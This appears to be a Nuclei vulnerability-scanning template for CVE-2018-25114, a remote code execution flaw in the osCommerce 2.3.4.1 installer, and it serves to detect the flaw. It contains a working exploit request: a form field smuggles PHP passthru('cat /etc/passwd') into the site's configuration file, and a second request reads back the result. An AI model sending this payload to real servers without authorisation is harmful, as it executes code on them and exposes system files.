id: CVE-2018-25114

info:
  name: osCommerce 2.3.4.1 - Remote Code Execution
  author: Suman_Kar
  severity: critical
  description: |
    osCommerce Online Merchant 2.3.4.1 contains a remote code execution vulnerability caused by an insecure default configuration and missing authentication in the installer workflow, letting unauthenticated attackers execute arbitrary PHP code via install_4.php. Exploitation requires the /install/ directory to remain accessible after installation.
  reference:
    - https://www.exploit-db.com/exploits/50128
    - https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution
    - https://www.exploit-db.com/exploits/44374
    - https://www.vulncheck.com/advisories/oscommerce-installer-unauth-config-file-injection-php-code-execution
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cve-id: CVE-2018-25114
    cwe-id: CWE-94
    epss-score: 0.85783
    epss-percentile: 0.99332
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2018,rce,oscommerce,edb,vuln,vkev

http:
  - raw:
      - |
        POST /install/install.php?step=4 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A

      - |
        GET /install/includes/configure.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f5c468da49f8bb8a8638a27ed5c638999b43c1adec07299f880a78309254010f022039319df860602274d9df8ee048a632fd482644233732a4cf0a9a88e8eb9d6ead:922c64590222798bb761d5b6d8e72950